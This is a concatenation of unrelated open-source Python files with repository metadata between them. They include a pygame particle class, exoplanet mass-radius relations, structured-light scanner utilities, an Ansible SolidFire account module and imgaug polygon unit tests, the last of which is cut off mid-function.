raise ValueError("Invalid value for `write_bytes_per_sec`, must be a value greater than or equal to `0`")
if key == "writes_per_sec" and value is not None:
if value < 0:
raise ValueError("Invalid value for `writes_per_sec`, must be a value greater than or equal to `0`")
if key == "service_usec_per_read_op_cache_reduction" and value is not None:
if value > 1.0:
raise ValueError("Invalid value for `service_usec_per_read_op_cache_reduction`, value must be less than or equal to `1.0`")
if value < 0.0:
raise ValueError("Invalid value for `service_usec_per_read_op_cache_reduction`, must be a value greater than or equal to `0.0`")
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(HostGroupPerformanceByArray, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, HostGroupPerformanceByArray):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 56.625683 | 294 | 0.664608 |
b9691245e0dd71130bb6f8e67087d8965c651bf5 | 159 | py | Python | coincident_event_finder/__init__.py | noahhdf/fact-magic-coincident-events | fcac6ab733961f6dda1ceac6406cbe2c0d4d8e45 | [
"MIT"
] | null | null | null | coincident_event_finder/__init__.py | noahhdf/fact-magic-coincident-events | fcac6ab733961f6dda1ceac6406cbe2c0d4d8e45 | [
"MIT"
] | null | null | null | coincident_event_finder/__init__.py | noahhdf/fact-magic-coincident-events | fcac6ab733961f6dda1ceac6406cbe2c0d4d8e45 | [
"MIT"
] | null | null | null | from .coincidents import coincident_indices, coincidents
from .eventmerge import merge_events
__all__ = ["coincidents", "coincident_indices", "merge_events"]
| 31.8 | 63 | 0.81761 |
d5341972ab17ea0b515acce184da51b83827935e | 849 | py | Python | src/plugins/PlatPyGame/code/particles.py | StryQ1/Project-Acturus-X | e1d928eb751befcfd2ad9f1cf50a32749f97b23c | [
"Apache-2.0"
] | 3 | 2022-03-21T07:40:24.000Z | 2022-03-21T11:16:43.000Z | src/plugins/PlatPyGame/code/particles.py | StryQ1/Project-Acturus-X | e1d928eb751befcfd2ad9f1cf50a32749f97b23c | [
"Apache-2.0"
] | null | null | null | src/plugins/PlatPyGame/code/particles.py | StryQ1/Project-Acturus-X | e1d928eb751befcfd2ad9f1cf50a32749f97b23c | [
"Apache-2.0"
] | null | null | null | import pygame
from support import import_folder
class ParticleEffect(pygame.sprite.Sprite):
def __init__(self,pos,type):
super().__init__()
self.frame_index = 0
self.animation_speed = 0.5
if type == 'jump':
self.frames = import_folder('../graphics/character/dust_particles/jump')
if type == 'land':
self.frames = import_folder('../graphics/character/dust_particles/land')
if type == 'explosion':
self.frames = import_folder('../graphics/enemy/explosion')
self.image = self.frames[self.frame_index]
self.rect = self.image.get_rect(center = pos)
def animate(self):
self.frame_index += self.animation_speed
if self.frame_index >= len(self.frames):
self.kill()
else:
self.image = self.frames[int(self.frame_index)]
def update(self,x_shift):
self.animate()
self.rect.x += x_shift
| 30.321429 | 76 | 0.693757 |
cab803326f28cbc64ccfcd4daed9758b6b6e9f78 | 6,316 | py | Python | peerless/mr.py | dfm/single-transits | 311aae377d756b427cef14974a5915553696c7ab | [
"MIT"
] | null | null | null | peerless/mr.py | dfm/single-transits | 311aae377d756b427cef14974a5915553696c7ab | [
"MIT"
] | null | null | null | peerless/mr.py | dfm/single-transits | 311aae377d756b427cef14974a5915553696c7ab | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import division, print_function
import h5py
import logging
import numpy as np
from .catalogs import Catalog, LocalCatalog, singleton
__all__ = ["WolfgangMRRelation"]
class WolfgangMRRelation(LocalCatalog):
filename = "wolfgang.csv"
def predict_mass(self, radius_samples, num_mass=None, maxiter=500):
radius_samples = np.atleast_1d(radius_samples)
shape = radius_samples.shape
flat_radii = radius_samples.flatten()
params = self.df
inds = np.ones(len(params), dtype=bool)
if num_mass is not None:
inds = np.random.randint(len(params), size=num_mass)
# Grab the parameter samples.
lnc = np.array(params["normconst"])[inds]
gamma = np.array(params["powindex"])[inds]
sigm = np.sqrt(np.array(params["varMR"]))[inds]
# Use Wolfgang+ (2016) Equation (2).
mu = lnc[:, None] + gamma[:, None] * np.log(flat_radii)[None, :]
std = sigm[:, None] + np.zeros_like(mu)
mass = np.exp(mu) + std * np.random.randn(*(mu.shape))
# Iterate until none of the masses are < 0.0.
for i in range(maxiter):
m = mass < 0.0
if not np.any(m):
break
mass[m] = np.exp(mu[m]) + std[m] * np.random.randn(m.sum())
if i == maxiter - 1:
logging.warn("Some masses still incorrect after 'maxiter'")
# For R > 9 R_E, use a log-normal distribution.
mask = flat_radii > 9.0
lnm = 0.04590711 + 0.3919828*np.random.randn(len(mass), mask.sum())
mass[:, mask] = np.exp(lnm + np.log(317.828))
# Reshape the samples into the correct (num_mass, ...) shape.
final_shape = [len(lnc)] + list(shape)
return mass.reshape(final_shape)
class ChenMRRelation(Catalog):
url = ("https://github.com/chenjj2/forecaster/blob/master/"
"fitting_parameters.h5?raw=true")
name = "chen"
_grid = None
def _save_fetched_file(self, file_handle):
with open(self.filename, "wb") as f:
f.write(file_handle.read())
with h5py.File(self.filename, "r") as f:
log_r, log_m, grid = self.make_grid(f["hyper_posterior"][...])
with h5py.File(self.filename, "w") as f:
f.create_dataset("log10_radius_bins", data=log_r)
f.create_dataset("log10_mass_bins", data=log_m)
f.create_dataset("cumulative_probability", data=grid)
def make_grid(self, samples):
"""
Convert the model from Chen & Kipping to ``p(log(M) | log(R))``
The idea here is their model gives ``p(log(R) | log(M)) =
N(mu(M), std(M))`` and, by the chain rule, we can compute
``p(log(M) | log(R)) = p(log(R) | log(M)) * p(log(M)) / p(log(R))``.
If we assume a flat prior in ``log(M)``, we can numerically compute
the required probability distribution on a grid.
"""
log_mass = np.linspace(np.log10(1e-4), np.log10(1e6), 800)
log_radius = np.linspace(np.log10(0.1), np.log10(100.0), 901)
# Get the parameters into the correct shape.
npop = (samples.shape[-1] - 1) // 3 + 1
slope = samples[:, 1:1+npop]
sigma = samples[:, 1+npop:1+2*npop]
split = samples[:, 1+2*npop:3*npop]
const = np.empty_like(slope)
const[:, 0] = samples[:, 0]
for i in range(1, npop):
delta = slope[:, i-1] - slope[:, i]
const[:, i] = const[:, i-1] + split[:, i-1] * delta
grid = -np.inf + np.zeros((len(log_radius), len(log_mass)))
dm = log_mass[1] - log_mass[0]
print("Computing grid -- this might take a minute...")
for i in np.random.randint(0, len(samples), 2048):
log_mass_bins = np.concatenate(([log_mass[0]-dm],
split[i],
[log_mass[-1]+dm]))
inds = np.digitize(log_mass, log_mass_bins) - 1
mu = log_mass * slope[i, inds] + const[i, inds]
std = sigma[i, inds]
log_pred = -0.5 * ((log_radius[:, None]-mu)/std)**2
log_pred -= np.log(std)
grid = np.logaddexp(grid, log_pred)
# Normalize the grid as p(log M | log R)
grid = np.cumsum(np.exp(grid), axis=1)
grid /= grid[:, -1][:, None]
dr = log_radius[1] - log_radius[0]
log_mass_bins = np.append(log_mass[0]-0.5*dr, log_mass+0.5*dr)
log_radius_bins = np.append(log_radius[0]-0.5*dr, log_radius+0.5*dr)
return log_radius_bins, log_mass_bins, grid
def open(self):
return h5py.File(self.filename, "r")
@property
def grid(self):
if self._grid is None:
self.fetch()
with h5py.File(self.filename, "r") as f:
self._grid = dict(
log10_radius_bins=f["log10_radius_bins"][...],
log10_mass_bins=f["log10_mass_bins"][...],
cumulative_probability=f["cumulative_probability"][...],
)
return self._grid
def predict_mass(self, radius_samples, num_mass=10000):
radius_samples = np.atleast_1d(radius_samples)
shape = radius_samples.shape
flat_log_r = np.log10(radius_samples.flatten())
g = self.grid
log_r = g["log10_radius_bins"]
log_m = g["log10_mass_bins"]
grid = g["cumulative_probability"]
r_inds = np.digitize(flat_log_r, log_r) - 1
if np.any(r_inds < 0) or np.any(r_inds >= len(log_r) - 1):
logging.warn("Radii outside of grid")
r_inds[r_inds < 0] = 0
r_inds[r_inds >= len(log_r) - 1] = len(log_r) - 2
# Sample the masses.
cp = grid[r_inds]
mass = np.empty((num_mass, len(cp)))
dm = log_m[1] - log_m[0]
for i, c in enumerate(cp):
u = np.random.rand(num_mass)
j = np.digitize(u, c) - 1
mass[:, i] = 10**(log_m[j] + dm * np.random.rand(num_mass))
# Reshape the samples into the correct (num_mass, ...) shape.
final_shape = [num_mass] + list(shape)
return mass.reshape(final_shape)
WolfgangMRRelation = singleton(WolfgangMRRelation)
ChenMRRelation = singleton(ChenMRRelation)
| 37.595238 | 76 | 0.566498 |
bc1b77b8ef0c5a936be1ba6959355645a1ed08ee | 4,115 | py | Python | lib/utils.py | jzx-gooner/Structured-Light-Scanner | a5762e193ef040e1d88393c390c3afa1be43b175 | [
"MIT"
] | 6 | 2021-11-11T02:32:55.000Z | 2022-02-28T12:38:54.000Z | lib/utils.py | jzx-gooner/Structured-Light-Scanner | a5762e193ef040e1d88393c390c3afa1be43b175 | [
"MIT"
] | null | null | null | lib/utils.py | jzx-gooner/Structured-Light-Scanner | a5762e193ef040e1d88393c390c3afa1be43b175 | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from typing import Optional
import cv2
import numpy as np
import open3d as o3d
@dataclass(frozen=True)
class Plane:
origin: np.ndarray
normal: np.ndarray
R: Optional[np.ndarray] = None
@dataclass(frozen=True)
class Point:
x: int
y: int
@dataclass(frozen=True)
class Rectangle:
top_left: Point
bottom_right: Point
@dataclass(frozen=True)
class ExtremePoints:
wall: Rectangle
desk: Rectangle
def draw_circles(image, points, text=False,color=(50, 50, 255)):
"""
Given an image, draw colored circles on each point
specified in `points`.
If text is True, each corner is also tagged with an increasing number.
"""
for i, point in enumerate(points):
p = tuple([int(i) for i in point[0]])
cv2.circle(image, p, 4, color, -1)
if text:
cv2.putText(
image,
text=str(i),
org=p,
fontFace=1,
fontScale=1.5,
color=color,
)
def fit_plane(points):
"""
Fit a plane through a bunch of 3D points.
Return the plane as an (origin, normal) tuple.
"""
mean = np.mean(points, axis=0)
xx = 0
xy = 0
xz = 0
yy = 0
yz = 0
zz = 0
for point in points:
diff = point - mean
xx += diff[0] * diff[0]
xy += diff[0] * diff[1]
xz += diff[0] * diff[2]
yy += diff[1] * diff[1]
yz += diff[1] * diff[2]
zz += diff[2] * diff[2]
det_x = yy * zz - yz * yz
det_y = xx * zz - xz * xz
det_z = xx * yy - xy * xy
det_max = max(det_x, det_y, det_z)
if det_max == det_x:
normal = np.array([det_x, xz * yz - xy * zz, xy * yz - xz * yy])
elif det_max == det_y:
normal = np.array([xz * yz - xy * zz, det_y, xy * xz - yz * xx])
else:
normal = np.array([xy * yz - xz * yy, xy * xz - yz * xx, det_z])
normal = normal / np.linalg.norm(normal)
return Plane(origin=np.array(mean), normal=normal)
def to_binary_image(img):
"""
Given an image, return it as a B/W thresholded image.
"""
img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
img_thresholded = cv2.threshold(
img_gray, 100, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU
)[1]
return img_thresholded
def line_plane_intersection(plane_origin, plane_normal, line_direction):
"""
Given a point on a plane, the normal to the plane at that point and a ray in 3D,
find the intersection point between the 3D ray and the 3D plane.
"""
d = np.dot(plane_origin, plane_normal) / np.dot(line_direction, plane_normal)
return line_direction * d
def load_intrinsics(debug=True):
"""
Load the matrix of intrinsic parameters K and the five distortion parameters
from the XML file saved after having performed camera calibration.
"""
intrinsics = cv2.FileStorage("calibration/intrinsics.xml", cv2.FILE_STORAGE_READ)
K = intrinsics.getNode("K").mat()
dist = intrinsics.getNode("dist").mat()
if debug:
print(f"K:\n{K}")
print(f"Distortion parameters:\n{dist}\n\n")
return K, dist
def show_image(img, continuous=False):
"""
Show an image. If continuous is True, the display
is non-breaking and can be closed by hitting Q.
"""
cv2.imshow("Image", img)
if not continuous:
cv2.waitKey(0)
cv2.destroyAllWindows()
return cv2.waitKey(1) & 0xFF == ord("q")
def show_pointcloud(points,colors):
"""
Given points in the 3D world, save the PLY file representing
the point cloud. This function saves both the original file and
a version to which an outlier removal process has been applied.
"""
pcd = o3d.geometry.PointCloud()
pcd.points = o3d.utility.Vector3dVector(np.vstack(points).astype(np.float64))
pcd.colors = o3d.utility.Vector3dVector(np.vstack(colors))
vis.draw_geometries([pcd])
| 27.804054 | 86 | 0.592467 |
a4f270892fa9061df74cbf985847a5fdf81781a5 | 8,702 | py | Python | ansible/venv/lib/python2.7/site-packages/ansible/modules/storage/netapp/_sf_account_manager.py | gvashchenkolineate/gvashchenkolineate_infra_trytravis | 0fb18850afe0d8609693ba4b23f29c7cda17d97f | [
"MIT"
] | 17 | 2017-06-07T23:15:01.000Z | 2021-08-30T14:32:36.000Z | ansible/ansible/modules/storage/netapp/_sf_account_manager.py | SergeyCherepanov/ansible | 875711cd2fd6b783c812241c2ed7a954bf6f670f | [
"MIT"
] | 9 | 2017-06-25T03:31:52.000Z | 2021-05-17T23:43:12.000Z | ansible/ansible/modules/storage/netapp/_sf_account_manager.py | SergeyCherepanov/ansible | 875711cd2fd6b783c812241c2ed7a954bf6f670f | [
"MIT"
] | 3 | 2018-05-26T21:31:22.000Z | 2019-09-28T17:00:45.000Z | #!/usr/bin/python
# (c) 2017, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['deprecated'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: sf_account_manager
deprecated:
removed_in: "2.11"
why: This Module has been replaced
alternative: please use M(na_elementsw_account)
short_description: Manage SolidFire accounts
extends_documentation_fragment:
- netapp.solidfire
version_added: '2.3'
author: Sumit Kumar (@timuster) <sumit4@netapp.com>
description:
- Create, destroy, or update accounts on SolidFire
options:
state:
description:
- Whether the specified account should exist or not.
required: true
choices: ['present', 'absent']
name:
description:
- Unique username for this account. (May be 1 to 64 characters in length).
required: true
new_name:
description:
- New name for the user account.
initiator_secret:
description:
- CHAP secret to use for the initiator. Should be 12-16 characters long and impenetrable.
- The CHAP initiator secrets must be unique and cannot be the same as the target CHAP secret.
- If not specified, a random secret is created.
target_secret:
description:
- CHAP secret to use for the target (mutual CHAP authentication).
- Should be 12-16 characters long and impenetrable.
- The CHAP target secrets must be unique and cannot be the same as the initiator CHAP secret.
- If not specified, a random secret is created.
attributes:
description: List of Name/Value pairs in JSON object format.
account_id:
description:
- The ID of the account to manage or update.
status:
description:
- Status of the account.
'''
EXAMPLES = """
- name: Create Account
sf_account_manager:
hostname: "{{ solidfire_hostname }}"
username: "{{ solidfire_username }}"
password: "{{ solidfire_password }}"
state: present
name: TenantA
- name: Modify Account
sf_account_manager:
hostname: "{{ solidfire_hostname }}"
username: "{{ solidfire_username }}"
password: "{{ solidfire_password }}"
state: present
name: TenantA
new_name: TenantA-Renamed
- name: Delete Account
sf_account_manager:
hostname: "{{ solidfire_hostname }}"
username: "{{ solidfire_username }}"
password: "{{ solidfire_password }}"
state: absent
name: TenantA-Renamed
"""
RETURN = """
"""
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible.module_utils.netapp as netapp_utils
HAS_SF_SDK = netapp_utils.has_sf_sdk()
class SolidFireAccount(object):
def __init__(self):
self.argument_spec = netapp_utils.ontap_sf_host_argument_spec()
self.argument_spec.update(dict(
state=dict(required=True, choices=['present', 'absent']),
name=dict(required=True, type='str'),
account_id=dict(required=False, type='int', default=None),
new_name=dict(required=False, type='str', default=None),
initiator_secret=dict(required=False, type='str'),
target_secret=dict(required=False, type='str'),
attributes=dict(required=False, type='dict'),
status=dict(required=False, type='str'),
))
self.module = AnsibleModule(
argument_spec=self.argument_spec,
supports_check_mode=True
)
p = self.module.params
# set up state variables
self.state = p['state']
self.name = p['name']
self.account_id = p['account_id']
self.new_name = p['new_name']
self.initiator_secret = p['initiator_secret']
self.target_secret = p['target_secret']
self.attributes = p['attributes']
self.status = p['status']
if HAS_SF_SDK is False:
self.module.fail_json(msg="Unable to import the SolidFire Python SDK")
else:
self.sfe = netapp_utils.create_sf_connection(module=self.module)
def get_account(self):
"""
Return account object if found
:return: Details about the account. None if not found.
:rtype: dict
"""
account_list = self.sfe.list_accounts()
for account in account_list.accounts:
if account.username == self.name:
# Update self.account_id:
if self.account_id is not None:
if account.account_id == self.account_id:
return account
else:
self.account_id = account.account_id
return account
return None
def create_account(self):
try:
self.sfe.add_account(username=self.name,
initiator_secret=self.initiator_secret,
target_secret=self.target_secret,
attributes=self.attributes)
except Exception as e:
self.module.fail_json(msg='Error creating account %s: %s)' % (self.name, to_native(e)),
exception=traceback.format_exc())
def delete_account(self):
try:
self.sfe.remove_account(account_id=self.account_id)
except Exception as e:
self.module.fail_json(msg='Error deleting account %s: %s' % (self.account_id, to_native(e)),
exception=traceback.format_exc())
def update_account(self):
try:
self.sfe.modify_account(account_id=self.account_id,
username=self.new_name,
status=self.status,
initiator_secret=self.initiator_secret,
target_secret=self.target_secret,
attributes=self.attributes)
except Exception as e:
self.module.fail_json(msg='Error updating account %s: %s' % (self.account_id, to_native(e)),
exception=traceback.format_exc())
def apply(self):
changed = False
account_exists = False
update_account = False
account_detail = self.get_account()
if account_detail:
account_exists = True
if self.state == 'absent':
changed = True
elif self.state == 'present':
# Check if we need to update the account
if account_detail.username is not None and self.new_name is not None and \
account_detail.username != self.new_name:
update_account = True
changed = True
elif account_detail.status is not None and self.status is not None \
and account_detail.status != self.status:
update_account = True
changed = True
elif account_detail.initiator_secret is not None and self.initiator_secret is not None \
and account_detail.initiator_secret != self.initiator_secret:
update_account = True
changed = True
elif account_detail.target_secret is not None and self.target_secret is not None \
and account_detail.target_secret != self.target_secret:
update_account = True
changed = True
elif account_detail.attributes is not None and self.attributes is not None \
and account_detail.attributes != self.attributes:
update_account = True
changed = True
else:
if self.state == 'present':
changed = True
if changed:
if self.module.check_mode:
pass
else:
if self.state == 'present':
if not account_exists:
self.create_account()
elif update_account:
self.update_account()
elif self.state == 'absent':
self.delete_account()
self.module.exit_json(changed=changed)
def main():
v = SolidFireAccount()
v.apply()
if __name__ == '__main__':
main()
| 32.349442 | 104 | 0.585383 |
eb9b7d3ca7dca39d3125958ddfd4192eb81a07f6 | 98,752 | py | Python | test/augmentables/test_polys.py | Gokkulnath/imgaug | d66b76177eb95eca767d70ab2be813fea7cd9000 | [
"MIT"
] | 1 | 2019-04-01T11:16:16.000Z | 2019-04-01T11:16:16.000Z | test/augmentables/test_polys.py | Gokkulnath/imgaug | d66b76177eb95eca767d70ab2be813fea7cd9000 | [
"MIT"
] | null | null | null | test/augmentables/test_polys.py | Gokkulnath/imgaug | d66b76177eb95eca767d70ab2be813fea7cd9000 | [
"MIT"
] | 1 | 2020-01-21T15:28:38.000Z | 2020-01-21T15:28:38.000Z | from __future__ import print_function, division, absolute_import
import time
import warnings
import sys
# unittest only added in 3.4 self.subTest()
if sys.version_info[0] < 3 or sys.version_info[1] < 4:
import unittest2 as unittest
else:
import unittest
# unittest.mock is not available in 2.7 (though unittest2 might contain it?)
try:
import unittest.mock as mock
except ImportError:
import mock
import matplotlib
matplotlib.use('Agg') # fix execution of tests involving matplotlib on travis
import numpy as np
import six.moves as sm
import shapely
import shapely.geometry
import imgaug as ia
from imgaug.testutils import reseed
from imgaug.augmentables.polys import (
_convert_points_to_shapely_line_string, _interpolate_point_pair, _interpolate_point_pair,
_interpolate_points, _interpolate_points_by_max_distance,
_ConcavePolygonRecoverer
)
def main():
test_Polygon___init__()
test_Polygon_xx()
test_Polygon_yy()
test_Polygon_xx_int()
test_Polygon_yy_int()
test_Polygon_is_valid()
test_Polygon_area()
test_Polygon_height()
test_Polygon_width()
test_Polygon_project()
test_Polygon_find_closest_point_idx()
test_Polygon__compute_inside_image_point_mask()
test_Polygon_is_fully_within_image()
test_Polygon_is_partly_within_image()
test_Polygon_is_out_of_image()
test_Polygon_cut_out_of_image()
test_Polygon_clip_out_of_image()
test_Polygon_shift()
test_Polygon_draw_on_image()
test_Polygon_extract_from_image()
test_Polygon_to_shapely_polygon()
test_Polygon_to_bounding_box()
test_Polygon_from_shapely()
test_Polygon_copy()
test_Polygon_deepcopy()
test_Polygon___repr__()
test_Polygon___str__()
test___convert_points_to_shapely_line_string()
test__interpolate_point_pair()
test__interpolate_points()
test__interpolate_points_by_max_distance()
def test_Polygon___init__():
# exterior is list of Keypoint or
poly = ia.Polygon([ia.Keypoint(x=0, y=0), ia.Keypoint(x=1, y=1), ia.Keypoint(x=0.5, y=2.5)])
assert poly.exterior.dtype.type == np.float32
assert np.allclose(
poly.exterior,
np.float32([
[0.0, 0.0],
[1.0, 1.0],
[0.5, 2.5]
])
)
# exterior is list of tuple of floats
poly = ia.Polygon([(0.0, 0.0), (1.0, 1.0), (0.5, 2.5)])
assert poly.exterior.dtype.type == np.float32
assert np.allclose(
poly.exterior,
np.float32([
[0.0, 0.0],
[1.0, 1.0],
[0.5, 2.5]
])
)
# exterior is list of tuple of integer
poly = ia.Polygon([(0, 0), (1, 1), (1, 3)])
assert poly.exterior.dtype.type == np.float32
assert np.allclose(
poly.exterior,
np.float32([
[0.0, 0.0],
[1.0, 1.0],
[1.0, 3.0]
])
)
# exterior is (N,2) ndarray
poly = ia.Polygon(
np.float32([
[0.0, 0.0],
[1.0, 1.0],
[0.5, 2.5]
])
)
assert poly.exterior.dtype.type == np.float32
assert np.allclose(
poly.exterior,
np.float32([
[0.0, 0.0],
[1.0, 1.0],
[0.5, 2.5]
])
)
# exterior is (N,2) ndarray in float64
poly = ia.Polygon(
np.float64([
[0.0, 0.0],
[1.0, 1.0],
[0.5, 2.5]
])
)
assert poly.exterior.dtype.type == np.float32
assert np.allclose(
poly.exterior,
np.float32([
[0.0, 0.0],
[1.0, 1.0],
[0.5, 2.5]
])
)
# arrays without points
poly = ia.Polygon([])
assert poly.exterior.dtype.type == np.float32
assert poly.exterior.shape == (0, 2)
poly = ia.Polygon(np.zeros((0, 2), dtype=np.float32))
assert poly.exterior.dtype.type == np.float32
assert poly.exterior.shape == (0, 2)
# bad array shape
got_exception = False
try:
_ = ia.Polygon(np.zeros((8,), dtype=np.float32))
except:
got_exception = True
assert got_exception
# label
poly = ia.Polygon([(0, 0)])
assert poly.label is None
poly = ia.Polygon([(0, 0)], label="test")
assert poly.label == "test"
def test_Polygon_xx():
poly = ia.Polygon([(0, 0), (1, 0), (1.5, 0), (4.1, 1), (2.9, 2.0)])
assert poly.xx.dtype.type == np.float32
assert np.allclose(poly.xx, np.float32([0.0, 1.0, 1.5, 4.1, 2.9]))
poly = ia.Polygon([])
assert poly.xx.dtype.type == np.float32
assert poly.xx.shape == (0,)
def test_Polygon_yy():
poly = ia.Polygon([(0, 0), (0, 1), (0, 1.5), (1, 4.1), (2.0, 2.9)])
assert poly.yy.dtype.type == np.float32
assert np.allclose(poly.yy, np.float32([0.0, 1.0, 1.5, 4.1, 2.9]))
poly = ia.Polygon([])
assert poly.yy.dtype.type == np.float32
assert poly.yy.shape == (0,)
def test_Polygon_xx_int():
poly = ia.Polygon([(0, 0), (1, 0), (1.5, 0), (4.1, 1), (2.9, 2.0)])
assert poly.xx_int.dtype.type == np.int32
assert np.allclose(poly.xx_int, np.int32([0, 1, 2, 4, 3]))
poly = ia.Polygon([])
assert poly.xx_int.dtype.type == np.int32
assert poly.xx_int.shape == (0,)
def test_Polygon_yy_int():
poly = ia.Polygon([(0, 0), (0, 1), (0, 1.5), (1, 4.1), (2.0, 2.9)])
assert poly.yy_int.dtype.type == np.int32
assert np.allclose(poly.yy_int, np.int32([0, 1, 2, 4, 3]))
poly = ia.Polygon([])
assert poly.yy_int.dtype.type == np.int32
assert poly.yy_int.shape == (0,)
def test_Polygon_is_valid():
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
assert poly.is_valid
poly = ia.Polygon([])
assert not poly.is_valid
poly = ia.Polygon([(0, 0)])
assert not poly.is_valid
poly = ia.Polygon([(0, 0), (1, 0)])
assert not poly.is_valid
poly = ia.Polygon([(0, 0), (1, 0), (-1, 0.5), (1, 1), (0, 1)])
assert not poly.is_valid
poly = ia.Polygon([(0, 0), (1, 0), (1, 0), (1, 1), (0, 1)])
assert poly.is_valid
def test_Polygon_area():
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
assert 1.0 - 1e-8 < poly.area < 1.0 + 1e-8
poly = ia.Polygon([(0, 0), (2, 0), (2, 1), (0, 1)])
assert 2.0 - 1e-8 < poly.area < 2.0 + 1e-8
poly = ia.Polygon([(0, 0), (1, 1), (0, 1)])
assert 1/2 - 1e-8 < poly.area < 1/2 + 1e-8
poly = ia.Polygon([(0, 0), (1, 1)])
got_exception = False
try:
_ = poly.area
except Exception as exc:
assert "Cannot compute the polygon's area because" in str(exc)
got_exception = True
assert got_exception
def test_Polygon_height():
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
assert np.allclose(poly.height, 1.0, atol=1e-8, rtol=0)
poly = ia.Polygon([(0, 0), (1, 0), (1, 2), (0, 2)])
assert np.allclose(poly.height, 2.0, atol=1e-8, rtol=0)
poly = ia.Polygon([(0, 0), (1, 1), (0, 1)])
assert np.allclose(poly.height, 1.0, atol=1e-8, rtol=0)
poly = ia.Polygon([(0, 0), (1, 1)])
assert np.allclose(poly.height, 1.0, atol=1e-8, rtol=0)
poly = ia.Polygon([(0, 0)])
assert np.allclose(poly.height, 0.0, atol=1e-8, rtol=0)
def test_Polygon_width():
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
assert np.allclose(poly.width, 1.0, atol=1e-8, rtol=0)
poly = ia.Polygon([(0, 0), (2, 0), (2, 1), (0, 1)])
assert np.allclose(poly.width, 2.0, atol=1e-8, rtol=0)
poly = ia.Polygon([(0, 0), (1, 1), (0, 1)])
assert np.allclose(poly.width, 1.0, atol=1e-8, rtol=0)
poly = ia.Polygon([(0, 0), (1, 1)])
assert np.allclose(poly.width, 1.0, atol=1e-8, rtol=0)
poly = ia.Polygon([(0, 0)])
assert np.allclose(poly.width, 0.0, atol=1e-8, rtol=0)
def test_Polygon_project():
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
poly_proj = poly.project((1, 1), (1, 1))
assert poly_proj.exterior.dtype.type == np.float32
assert poly_proj.exterior.shape == (4, 2)
assert np.allclose(
poly_proj.exterior,
np.float32([
[0, 0],
[1, 0],
[1, 1],
[0, 1]
])
)
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
poly_proj = poly.project((1, 1), (2, 2))
assert poly_proj.exterior.dtype.type == np.float32
assert poly_proj.exterior.shape == (4, 2)
assert np.allclose(
poly_proj.exterior,
np.float32([
[0, 0],
[2, 0],
[2, 2],
[0, 2]
])
)
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
poly_proj = poly.project((1, 1), (2, 1))
assert poly_proj.exterior.dtype.type == np.float32
assert poly_proj.exterior.shape == (4, 2)
assert np.allclose(
poly_proj.exterior,
np.float32([
[0, 0],
[1, 0],
[1, 2],
[0, 2]
])
)
poly = ia.Polygon([])
poly_proj = poly.project((1, 1), (2, 2))
assert poly_proj.exterior.dtype.type == np.float32
assert poly_proj.exterior.shape == (0, 2)
def test_Polygon_find_closest_point_idx():
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
closest_idx = poly.find_closest_point_index(x=0, y=0)
assert closest_idx == 0
closest_idx = poly.find_closest_point_index(x=1, y=0)
assert closest_idx == 1
closest_idx = poly.find_closest_point_index(x=1.0001, y=-0.001)
assert closest_idx == 1
closest_idx = poly.find_closest_point_index(x=0.2, y=0.2)
assert closest_idx == 0
closest_idx, distance = poly.find_closest_point_index(x=0, y=0, return_distance=True)
assert closest_idx == 0
assert np.allclose(distance, 0.0)
closest_idx, distance = poly.find_closest_point_index(x=0.1, y=0.15, return_distance=True)
assert closest_idx == 0
assert np.allclose(distance, np.sqrt((0.1**2) + (0.15**2)))
closest_idx, distance = poly.find_closest_point_index(x=0.9, y=0.15, return_distance=True)
assert closest_idx == 1
assert np.allclose(distance, np.sqrt(((1.0-0.9)**2) + (0.15**2)))
def test_Polygon__compute_inside_image_point_mask():
poly = ia.Polygon([(0, 0), (0.999, 0), (0.999, 0.999), (0, 0.999)])
mask = poly._compute_inside_image_point_mask((1, 1, 3))
assert np.array_equal(mask, np.array([True, True, True, True], dtype=bool))
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
mask = poly._compute_inside_image_point_mask((1, 1, 3))
assert np.array_equal(mask, np.array([True, False, False, False], dtype=bool))
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
mask = poly._compute_inside_image_point_mask((1, 1))
assert np.array_equal(mask, np.array([True, False, False, False], dtype=bool))
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
mask = poly._compute_inside_image_point_mask(np.zeros((1, 1, 3), dtype=np.uint8))
assert np.array_equal(mask, np.array([True, False, False, False], dtype=bool))
def test_Polygon_is_fully_within_image():
